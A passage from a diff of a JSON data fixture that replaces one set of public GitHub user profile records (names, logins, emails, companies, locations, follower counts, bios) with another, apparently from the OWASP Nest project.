"public_repositories_count": 1, - "created_at": "2021-12-02T17:38:07Z", - "updated_at": "2022-12-28T18:18:47Z", - "node_id": "U_kgDOBbBD5w", + "public_repositories_count": 29, + "created_at": "2018-06-08T03:39:06Z", + "updated_at": "2024-09-22T14:03:23Z", + "node_id": "MDQ6VXNlcjQwMDQ5NzMz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421403,24 +680627,24 @@ }, { "model": "github.user", - "pk": 2447, + "pk": 7789, "fields": { - "nest_created_at": "2024-09-12T01:26:28.911Z", - "nest_updated_at": "2024-09-12T01:26:28.911Z", - "name": "Tim Birkett", - "login": "js-timbirkett", + "nest_created_at": "2024-09-22T09:36:45.557Z", + "nest_updated_at": "2024-09-22T19:35:47.681Z", + "name": "Ángel Riveira", + "login": "arivra", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57101177?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/61965217?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 17, - "public_repositories_count": 37, - "created_at": "2019-10-28T13:59:39Z", - "updated_at": "2022-12-15T11:38:27Z", - "node_id": "MDQ6VXNlcjU3MTAxMTc3", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-03-09T08:31:47Z", + "updated_at": "2024-09-11T14:25:07Z", + "node_id": "MDQ6VXNlcjYxOTY1MjE3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421428,74 +680652,149 @@ }, { "model": "github.user", - "pk": 2448, + "pk": 7790, "fields": { - "nest_created_at": "2024-09-12T01:26:30.168Z", - "nest_updated_at": "2024-09-12T01:34:54.943Z", - "name": "sahil gupta", - "login": "sahil3112", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43255158?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:36:45.867Z", + "nest_updated_at": "2024-09-22T19:35:47.998Z", + "name": "Alexander Steppke", + "login": "Miradorn", + "email": "alex@schram.me", + "avatar_url": "https://avatars.githubusercontent.com/u/1308885?v=4", + "company": "@remoteoss", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2018-09-13T23:11:13Z", - "updated_at": "2024-08-26T20:55:42Z", - "node_id": "MDQ6VXNlcjQzMjU1MTU4", - "bio": "Application Security | DevSecOps | Secure SDLC | Penetration Tester (Web, API and Thick Client) | CEHv10 | IBM Certified Cybersecurity Analyst Professional", + "following_count": 4, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 55, + "created_at": "2012-01-06T08:33:18Z", + "updated_at": "2024-09-13T21:42:41Z", + "node_id": "MDQ6VXNlcjEzMDg4ODU=", + "bio": "", "is_hireable": false, - "twitter_username": "sahil_3112" + "twitter_username": "m1rad" } }, { "model": "github.user", - "pk": 2449, + "pk": 7791, "fields": { - "nest_created_at": "2024-09-12T01:26:33.940Z", - "nest_updated_at": "2024-09-12T01:26:33.940Z", - "name": "Richard Carpenter", - "login": "artfulbodger", + "nest_created_at": "2024-09-22T09:36:46.201Z", + "nest_updated_at": "2024-09-22T19:35:48.310Z", + "name": "Nihal", + "login": "iamnihal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7009338?v=4", - "company": "CarpoDiem", - "location": "Devon, UK", + "avatar_url": "https://avatars.githubusercontent.com/u/37813784?v=4", + "company": "Atlassian", + "location": "Bengaluru", "collaborators_count": 0, - "following_count": 8, - "followers_count": 5, + "following_count": 86, + "followers_count": 46, "public_gists_count": 1, - "public_repositories_count": 34, - "created_at": "2014-03-20T09:37:51Z", - "updated_at": "2024-08-16T15:00:06Z", - "node_id": "MDQ6VXNlcjcwMDkzMzg=", - "bio": "DevSecOps - PowerShell and PHP Coder", - "is_hireable": false, + "public_repositories_count": 28, + "created_at": "2018-03-26T19:08:00Z", + "updated_at": "2024-09-22T19:24:41Z", + "node_id": "MDQ6VXNlcjM3ODEzNzg0", + "bio": "(Hack|Build)ing things", + "is_hireable": true, + "twitter_username": "iamnihal_" + } +}, +{ + "model": "github.user", + "pk": 7792, + "fields": { + "nest_created_at": "2024-09-22T09:36:46.517Z", + "nest_updated_at": "2024-09-22T19:35:48.617Z", + "name": "Jonathan Wilbur", + "login": "JonathanWilbur", + "email": "jonathan@wilbur.space", + "avatar_url": "https://avatars.githubusercontent.com/u/20342114?v=4", + "company": "", + "location": "Tampa, Florida", + "collaborators_count": 0, + "following_count": 100, + "followers_count": 39, + "public_gists_count": 0, + "public_repositories_count": 142, + "created_at": "2016-07-07T16:21:04Z", + "updated_at": "2023-12-04T20:11:42Z", + "node_id": "MDQ6VXNlcjIwMzQyMTE0", + "bio": "X.500 Directories, X.509 PKI, ASN.1, LDAP, SMTP, IMAP, Cryptography, and H.323 Multimedia are my interests. I program mostly in TypeScript and Rust.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2450, + "pk": 7793, "fields": { - "nest_created_at": "2024-09-12T01:26:35.978Z", - "nest_updated_at": "2024-09-12T01:26:35.978Z", - "name": "", - "login": "CBerndt-Work", + "nest_created_at": "2024-09-22T09:36:46.839Z", + "nest_updated_at": "2024-09-22T19:35:48.937Z", + "name": "Brandon Ward", + "login": "Bwvolleyball", + "email": "brandon.ward@stackhawk.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8010983?v=4", + "company": "@stackhawk ", + "location": "Colorado", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2014-06-28T05:41:33Z", + "updated_at": "2024-08-23T11:31:46Z", + "node_id": "MDQ6VXNlcjgwMTA5ODM=", + "bio": "Software Engineer || Coder of Things ||\r\n\r\nIf you need to get my attention, try @'ing me on Twitter! I _might_ see it...", + "is_hireable": false, + "twitter_username": "Bwvolleyball7" + } +}, +{ + "model": "github.user", + "pk": 7794, + "fields": { + "nest_created_at": "2024-09-22T09:36:47.796Z", + "nest_updated_at": "2024-09-22T19:35:49.876Z", + "name": "Andreas Reichert", + "login": "reichertan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/93646183?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/70580399?v=4", + "company": "CGI", + "location": "Mainz, Germany", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-11-03T08:59:08Z", - "updated_at": "2024-07-09T20:16:40Z", - "node_id": "U_kgDOBZTtZw", + "public_repositories_count": 5, + "created_at": "2020-09-01T11:45:13Z", + "updated_at": "2024-04-23T15:03:53Z", + "node_id": "MDQ6VXNlcjcwNTgwMzk5", + "bio": "Software Developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7795, + "fields": { + "nest_created_at": "2024-09-22T09:36:48.118Z", + "nest_updated_at": "2024-09-22T19:35:50.188Z", + "name": "Carlos Juan Gómez Peñalver", + "login": "carlosjgp", + "email": "carlosjuangp@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1277613?v=4", + "company": "@automata-tech ", + "location": "London, United Kingdom", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 19, + "public_gists_count": 28, + "public_repositories_count": 80, + "created_at": "2011-12-21T12:59:06Z", + "updated_at": "2024-07-03T15:58:44Z", + "node_id": "MDQ6VXNlcjEyNzc2MTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421503,24 +680802,24 @@ }, { "model": "github.user", - "pk": 2451, + "pk": 7796, "fields": { - "nest_created_at": "2024-09-12T01:26:38.537Z", - "nest_updated_at": "2024-09-16T22:28:30.022Z", + "nest_created_at": "2024-09-22T09:36:48.452Z", + "nest_updated_at": "2024-09-22T19:35:50.501Z", "name": "", - "login": "kbolander", + "login": "ac-mercury", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/96793624?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26996495?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-12-28T19:09:58Z", - "updated_at": "2024-09-02T13:27:28Z", - "node_id": "U_kgDOBcT0GA", + "public_repositories_count": 3, + "created_at": "2017-04-07T06:00:35Z", + "updated_at": "2019-08-21T13:05:31Z", + "node_id": "MDQ6VXNlcjI2OTk2NDk1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421528,49 +680827,49 @@ }, { "model": "github.user", - "pk": 2452, + "pk": 7797, "fields": { - "nest_created_at": "2024-09-12T01:26:41.060Z", - "nest_updated_at": "2024-09-12T01:42:24.934Z", - "name": "Erik Weber", - "login": "eriweb", + "nest_created_at": "2024-09-22T09:36:49.086Z", + "nest_updated_at": "2024-09-22T19:35:51.180Z", + "name": "Cosmin Cojocar", + "login": "ccojocar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6181934?v=4", - "company": "@Norsk-Tipping ", - "location": "Hamar, Norway", + "avatar_url": "https://avatars.githubusercontent.com/u/591127?v=4", + "company": "Google", + "location": "Swizerland", "collaborators_count": 0, - "following_count": 359, - "followers_count": 50, - "public_gists_count": 17, - "public_repositories_count": 30, - "created_at": "2013-12-13T23:04:58Z", - "updated_at": "2024-08-05T07:36:37Z", - "node_id": "MDQ6VXNlcjYxODE5MzQ=", + "following_count": 0, + "followers_count": 123, + "public_gists_count": 0, + "public_repositories_count": 158, + "created_at": "2011-01-30T11:52:26Z", + "updated_at": "2024-09-13T11:32:29Z", + "node_id": "MDQ6VXNlcjU5MTEyNw==", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2453, + "pk": 7798, "fields": { - "nest_created_at": "2024-09-12T01:26:42.301Z", - "nest_updated_at": "2024-09-12T01:26:42.301Z", - "name": "", - "login": "nedmark", + "nest_created_at": "2024-09-22T09:36:49.398Z", + "nest_updated_at": "2024-09-22T19:35:51.503Z", + "name": "Aleksandr Chebotov", + "login": "al-cheb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30747283?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47745270?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 53, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-08-05T09:17:41Z", - "updated_at": "2022-11-30T12:18:37Z", - "node_id": "MDQ6VXNlcjMwNzQ3Mjgz", + "public_repositories_count": 31, + "created_at": "2019-02-18T12:36:06Z", + "updated_at": "2024-07-24T08:09:39Z", + "node_id": "MDQ6VXNlcjQ3NzQ1Mjcw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421578,24 +680877,24 @@ }, { "model": "github.user", - "pk": 2454, + "pk": 7799, "fields": { - "nest_created_at": "2024-09-12T01:26:46.410Z", - "nest_updated_at": "2024-09-12T01:26:46.410Z", + "nest_created_at": "2024-09-22T09:36:49.723Z", + "nest_updated_at": "2024-09-22T19:35:51.813Z", "name": "", - "login": "antgordon", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/56523753?v=4", + "login": "Crayeth", + "email": "maxim_de_bie@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13447761?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2019-10-14T00:46:25Z", - "updated_at": "2023-02-06T00:08:52Z", - "node_id": "MDQ6VXNlcjU2NTIzNzUz", + "public_repositories_count": 4, + "created_at": "2015-07-22T07:29:39Z", + "updated_at": "2024-07-11T08:16:23Z", + "node_id": "MDQ6VXNlcjEzNDQ3NzYx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421603,24 +680902,24 @@ }, { "model": "github.user", - "pk": 2455, + "pk": 7800, "fields": { - "nest_created_at": "2024-09-12T01:26:47.678Z", - "nest_updated_at": "2024-09-12T01:39:40.478Z", - "name": "Kenny Moens", - "login": "kmoens", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5837260?v=4", - "company": "Cipal Schaubroeck nv / Tieltse Wielervrienden vzw / Hondenclub Sint Bavo vzw", - "location": "Belgium", + "nest_created_at": "2024-09-22T09:36:50.359Z", + "nest_updated_at": "2024-09-22T19:35:52.500Z", + "name": "Eric Cornelissen", + "login": "ericcornelissen", + "email": "ericornelissen@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3742559?v=4", + "company": "", + "location": "Sweden", "collaborators_count": 0, - "following_count": 2, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2013-11-02T10:34:59Z", - "updated_at": "2024-04-16T12:51:48Z", - "node_id": "MDQ6VXNlcjU4MzcyNjA=", + "following_count": 1, + "followers_count": 46, + "public_gists_count": 12, + "public_repositories_count": 38, + "created_at": "2013-03-01T21:17:40Z", + "updated_at": "2024-09-13T11:53:05Z", + "node_id": "MDQ6VXNlcjM3NDI1NTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421628,24 +680927,24 @@ }, { "model": "github.user", - "pk": 2456, + "pk": 7801, "fields": { - "nest_created_at": "2024-09-12T01:26:50.181Z", - "nest_updated_at": "2024-09-12T01:26:50.181Z", - "name": "Alex", - "login": "lazyw0lf", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7389032?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:36:50.671Z", + "nest_updated_at": "2024-09-22T19:35:52.814Z", + "name": "Felipe Cecagno", + "login": "fcecagno", + "email": "fcecagno@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/502164?v=4", + "company": "Mconf (@mconf)", + "location": "Porto Alegre, RS, Brazil", "collaborators_count": 0, - "following_count": 18, - "followers_count": 9, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2014-04-23T21:42:04Z", - "updated_at": "2022-10-13T17:35:53Z", - "node_id": "MDQ6VXNlcjczODkwMzI=", + "following_count": 9, + "followers_count": 76, + "public_gists_count": 13, + "public_repositories_count": 31, + "created_at": "2010-11-29T17:49:47Z", + "updated_at": "2024-07-20T01:56:51Z", + "node_id": "MDQ6VXNlcjUwMjE2NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421653,24 +680952,24 @@ }, { "model": "github.user", - "pk": 2457, + "pk": 7802, "fields": { - "nest_created_at": "2024-09-12T01:26:51.409Z", - "nest_updated_at": "2024-09-12T01:26:51.409Z", - "name": "lightjw", - "login": "lightjw", + "nest_created_at": "2024-09-22T09:36:50.989Z", + "nest_updated_at": "2024-09-22T19:35:53.125Z", + "name": "Ivan Rumyantsev", + "login": "ncrl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42208084?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11519551?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, + "following_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2018-08-08T11:48:19Z", - "updated_at": "2024-09-06T11:48:59Z", - "node_id": "MDQ6VXNlcjQyMjA4MDg0", + "public_repositories_count": 6, + "created_at": "2015-03-17T11:05:20Z", + "updated_at": "2024-09-07T20:26:18Z", + "node_id": "MDQ6VXNlcjExNTE5NTUx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421678,24 +680977,24 @@ }, { "model": "github.user", - "pk": 2458, + "pk": 7803, "fields": { - "nest_created_at": "2024-09-12T01:26:57.614Z", - "nest_updated_at": "2024-09-12T01:26:57.614Z", - "name": "", - "login": "ajeshkc1", + "nest_created_at": "2024-09-22T09:36:51.701Z", + "nest_updated_at": "2024-09-22T19:35:53.759Z", + "name": "Sebastian Gumprich", + "login": "rndmh3ro", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37045004?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3198961?v=4", "company": "", - "location": "", + "location": "Dresden, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-03-04T15:43:11Z", - "updated_at": "2024-08-20T11:52:09Z", - "node_id": "MDQ6VXNlcjM3MDQ1MDA0", + "following_count": 46, + "followers_count": 84, + "public_gists_count": 8, + "public_repositories_count": 159, + "created_at": "2013-01-06T14:17:38Z", + "updated_at": "2024-09-15T11:24:29Z", + "node_id": "MDQ6VXNlcjMxOTg5NjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421703,24 +681002,24 @@ }, { "model": "github.user", - "pk": 2459, + "pk": 7804, "fields": { - "nest_created_at": "2024-09-12T01:26:58.851Z", - "nest_updated_at": "2024-09-12T01:26:58.851Z", - "name": "Rikita Ishikawa", - "login": "wonda-tea-coffee", - "email": "lagrange.resolvent@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/39144575?v=4", + "nest_created_at": "2024-09-22T09:36:52.012Z", + "nest_updated_at": "2024-09-22T19:35:54.076Z", + "name": "Quint van Zijl", + "login": "karavaan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59139211?v=4", "company": "", - "location": "", + "location": "The Hague", "collaborators_count": 0, - "following_count": 14, - "followers_count": 39, - "public_gists_count": 3, - "public_repositories_count": 74, - "created_at": "2018-05-10T02:39:45Z", - "updated_at": "2024-08-16T08:58:13Z", - "node_id": "MDQ6VXNlcjM5MTQ0NTc1", + "following_count": 11, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2019-12-22T12:35:31Z", + "updated_at": "2024-07-15T12:36:29Z", + "node_id": "MDQ6VXNlcjU5MTM5MjEx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421728,49 +681027,49 @@ }, { "model": "github.user", - "pk": 2460, + "pk": 7805, "fields": { - "nest_created_at": "2024-09-12T01:27:02.640Z", - "nest_updated_at": "2024-09-12T01:27:02.640Z", - "name": "", - "login": "tfactor2", + "nest_created_at": "2024-09-22T09:36:52.348Z", + "nest_updated_at": "2024-09-22T19:35:54.401Z", + "name": "Pierre", + "login": "p-l-", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7229951?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5064814?v=4", + "company": "@ivre", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 2, - "public_repositories_count": 17, - "created_at": "2014-04-08T19:02:18Z", - "updated_at": "2024-08-19T09:08:08Z", - "node_id": "MDQ6VXNlcjcyMjk5NTE=", - "bio": "", - "is_hireable": false, + "following_count": 209, + "followers_count": 379, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2013-07-22T12:26:44Z", + "updated_at": "2023-12-02T08:43:46Z", + "node_id": "MDQ6VXNlcjUwNjQ4MTQ=", + "bio": "Open-source maintainer (@ivre, @secdev), dev & contributor. IT security engineer.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2461, + "pk": 7806, "fields": { - "nest_created_at": "2024-09-12T01:27:03.870Z", - "nest_updated_at": "2024-09-12T01:27:03.870Z", - "name": "", - "login": "belahouel", + "nest_created_at": "2024-09-22T09:36:52.668Z", + "nest_updated_at": "2024-09-22T19:38:19.575Z", + "name": "Patrick Mayo", + "login": "pdmayoSFI", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/27809585?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/38007400?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-04-20T10:20:22Z", - "updated_at": "2023-04-05T13:46:40Z", - "node_id": "MDQ6VXNlcjI3ODA5NTg1", + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2018-04-02T13:45:00Z", + "updated_at": "2020-11-30T21:56:17Z", + "node_id": "MDQ6VXNlcjM4MDA3NDAw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421778,49 +681077,49 @@ }, { "model": "github.user", - "pk": 2462, + "pk": 7807, "fields": { - "nest_created_at": "2024-09-12T01:27:05.156Z", - "nest_updated_at": "2024-09-12T01:27:05.156Z", - "name": "", - "login": "nyerrabothula", + "nest_created_at": "2024-09-22T09:36:52.980Z", + "nest_updated_at": "2024-09-22T19:35:55.065Z", + "name": "Nicolas Velasquez", + "login": "nv-pipo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29912378?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7769945?v=4", "company": "", - "location": "", + "location": "Switzerland", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-07-05T06:59:40Z", - "updated_at": "2023-10-15T00:45:37Z", - "node_id": "MDQ6VXNlcjI5OTEyMzc4", + "public_repositories_count": 15, + "created_at": "2014-06-02T15:40:42Z", + "updated_at": "2024-08-30T20:08:38Z", + "node_id": "MDQ6VXNlcjc3Njk5NDU=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2463, + "pk": 7808, "fields": { - "nest_created_at": "2024-09-12T01:27:06.427Z", - "nest_updated_at": "2024-09-12T01:27:06.427Z", - "name": "", - "login": "xingheluqi", + "nest_created_at": "2024-09-22T09:36:53.608Z", + "nest_updated_at": "2024-09-22T19:35:55.733Z", + "name": "Michael Gibson", + "login": "michaelgibson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13388974?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2904692?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 7, - "created_at": "2015-07-18T02:21:32Z", - "updated_at": "2022-06-09T00:26:53Z", - "node_id": "MDQ6VXNlcjEzMzg4OTc0", + "followers_count": 8, + "public_gists_count": 8, + "public_repositories_count": 23, + "created_at": "2012-11-27T18:46:20Z", + "updated_at": "2024-07-17T15:10:26Z", + "node_id": "MDQ6VXNlcjI5MDQ2OTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421828,24 +681127,24 @@ }, { "model": "github.user", - "pk": 2464, + "pk": 7809, "fields": { - "nest_created_at": "2024-09-12T01:27:07.628Z", - "nest_updated_at": "2024-09-12T01:27:07.628Z", - "name": "", - "login": "naga5645", + "nest_created_at": "2024-09-22T09:36:54.248Z", + "nest_updated_at": "2024-09-22T19:35:56.366Z", + "name": "Javier Salado", + "login": "jsalado", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78976261?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12932925?v=4", + "company": "Anyverse", + "location": "Madrid, Spain", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-02-12T17:25:42Z", - "updated_at": "2022-03-15T09:40:11Z", - "node_id": "MDQ6VXNlcjc4OTc2MjYx", + "public_repositories_count": 14, + "created_at": "2015-06-17T08:12:16Z", + "updated_at": "2024-09-06T11:32:45Z", + "node_id": "MDQ6VXNlcjEyOTMyOTI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -421853,149 +681152,149 @@ }, { "model": "github.user", - "pk": 2465, + "pk": 7810, "fields": { - "nest_created_at": "2024-09-12T01:27:08.906Z", - "nest_updated_at": "2024-09-18T19:06:57.455Z", - "name": "Roman", - "login": "Kretikus", + "nest_created_at": "2024-09-22T09:36:54.567Z", + "nest_updated_at": "2024-09-22T19:35:56.682Z", + "name": "Julian (syn-4ck)", + "login": "syn-4ck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1334939?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43778014?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 5, - "public_repositories_count": 22, - "created_at": "2012-01-16T21:03:45Z", - "updated_at": "2024-09-16T14:01:18Z", - "node_id": "MDQ6VXNlcjEzMzQ5Mzk=", - "bio": "", + "following_count": 6, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2018-10-02T09:21:08Z", + "updated_at": "2024-08-18T12:37:11Z", + "node_id": "MDQ6VXNlcjQzNzc4MDE0", + "bio": "Computer Engineer. Working on Application Security / DevSecOps.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "syn_4ck" } }, { "model": "github.user", - "pk": 2466, + "pk": 7811, "fields": { - "nest_created_at": "2024-09-12T01:27:10.174Z", - "nest_updated_at": "2024-09-12T01:27:10.174Z", - "name": "dsaffie", - "login": "dsaffie", + "nest_created_at": "2024-09-22T09:36:54.903Z", + "nest_updated_at": "2024-09-22T19:35:57.007Z", + "name": "Kay Agahd", + "login": "kagahd", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/97295218?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17042479?v=4", + "company": "idealo", + "location": "Berlin", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-01-07T13:35:38Z", - "updated_at": "2024-08-06T18:19:34Z", - "node_id": "U_kgDOBcybcg", - "bio": "", + "following_count": 3, + "followers_count": 17, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2016-02-03T08:52:44Z", + "updated_at": "2024-08-25T13:07:07Z", + "node_id": "MDQ6VXNlcjE3MDQyNDc5", + "bio": "Software developer and security engineer.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2467, + "pk": 7812, "fields": { - "nest_created_at": "2024-09-12T01:27:11.465Z", - "nest_updated_at": "2024-09-12T01:27:14.040Z", - "name": "", - "login": "ultramaxim", + "nest_created_at": "2024-09-22T09:36:55.223Z", + "nest_updated_at": "2024-09-22T19:35:57.328Z", + "name": "Manuel Venega", + "login": "veneber", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/406954?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/127304555?v=4", + "company": "T-Systems (Deutsche Telekom)", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2010-09-19T11:50:00Z", - "updated_at": "2024-09-03T05:21:59Z", - "node_id": "MDQ6VXNlcjQwNjk1NA==", - "bio": "", + "public_repositories_count": 2, + "created_at": "2023-03-08T10:55:13Z", + "updated_at": "2024-05-02T12:28:32Z", + "node_id": "U_kgDOB5aDaw", + "bio": "DevSecOps Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2468, + "pk": 7813, "fields": { - "nest_created_at": "2024-09-12T01:27:17.134Z", - "nest_updated_at": "2024-09-12T01:27:17.134Z", - "name": "Dmitry", - "login": "rybas-dv", + "nest_created_at": "2024-09-22T09:36:55.559Z", + "nest_updated_at": "2024-09-22T19:35:57.646Z", + "name": "Marcos Valle", + "login": "marcosValle", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33660490?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5929526?v=4", "company": "", - "location": "", + "location": "Barcelona, ES", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-11-14T13:47:28Z", - "updated_at": "2024-06-29T08:59:06Z", - "node_id": "MDQ6VXNlcjMzNjYwNDkw", - "bio": "", + "following_count": 8, + "followers_count": 81, + "public_gists_count": 5, + "public_repositories_count": 49, + "created_at": "2013-11-13T13:19:34Z", + "updated_at": "2024-09-13T12:04:13Z", + "node_id": "MDQ6VXNlcjU5Mjk1MjY=", + "bio": "@_mvalle_", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2469, + "pk": 7814, "fields": { - "nest_created_at": "2024-09-12T01:27:18.409Z", - "nest_updated_at": "2024-09-12T01:27:19.670Z", - "name": "", - "login": "croniserb", + "nest_created_at": "2024-09-22T09:36:55.938Z", + "nest_updated_at": "2024-09-22T19:35:57.984Z", + "name": "Philip Hayton", + "login": "gotbadger", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23509761?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/699436?v=4", + "company": "@bearer", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-11-16T20:56:30Z", - "updated_at": "2024-03-04T11:43:12Z", - "node_id": "MDQ6VXNlcjIzNTA5NzYx", - "bio": "", - "is_hireable": false, + "following_count": 30, + "followers_count": 21, + "public_gists_count": 17, + "public_repositories_count": 57, + "created_at": "2011-03-30T14:15:15Z", + "updated_at": "2024-05-05T18:30:31Z", + "node_id": "MDQ6VXNlcjY5OTQzNg==", + "bio": "badger IRL", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2470, + "pk": 7815, "fields": { - "nest_created_at": "2024-09-12T01:27:25.462Z", - "nest_updated_at": "2024-09-12T01:27:25.462Z", - "name": "Michael Wellendorf", - "login": "software-testing-professional", + "nest_created_at": "2024-09-22T09:36:56.288Z", + "nest_updated_at": "2024-09-22T19:35:58.301Z", + "name": "Philipp Bandow", + "login": "philband", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/82155716?v=4", - "company": "software testing PROFESSIONAL", - "location": "Germany", + "avatar_url": 